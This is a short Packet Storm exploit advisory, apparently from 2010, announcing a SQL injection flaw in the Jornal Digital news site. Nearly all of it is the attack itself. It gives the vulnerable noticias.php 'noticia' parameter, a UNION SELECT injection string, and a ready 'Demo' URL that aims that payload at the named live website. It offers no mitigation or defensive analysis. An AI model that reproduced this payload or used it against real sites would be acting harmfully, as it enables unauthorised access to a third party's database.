Jornaldigital.com SQL Injection

2010-06-30T00:00:00
ID PACKETSTORM:91304
Type packetstorm
Reporter MasterGipy
Modified 2010-06-30T00:00:00

Description

                                        
                                            `  
  
  
____________________________________________________________  
  
[$] Exploit Title : Jornal Digital SQL Injection vulnerability  
[$] Date : 29-06-2010   
[$] Author : MasterGipy  
[$] Email : mastergipy [at] gmail.com  
[$] Bug : SQL Injection  
[$] Site : http://jornaldigital.com/  
[$] Google Dork : n/a  
  
  
  
  
[SQL Injection]  
  
[$] Exploit: noticias.php?noticia=[SQLi]  
noticias.php?noticia=-1+union+all+select+1,2--  
  
[D] Demo: http://jornaldigital.com/noticias.php?noticia=-1+union+all+select+1,2--  
  
  
  
[§] Greetings from PORTUGAL ^^  
`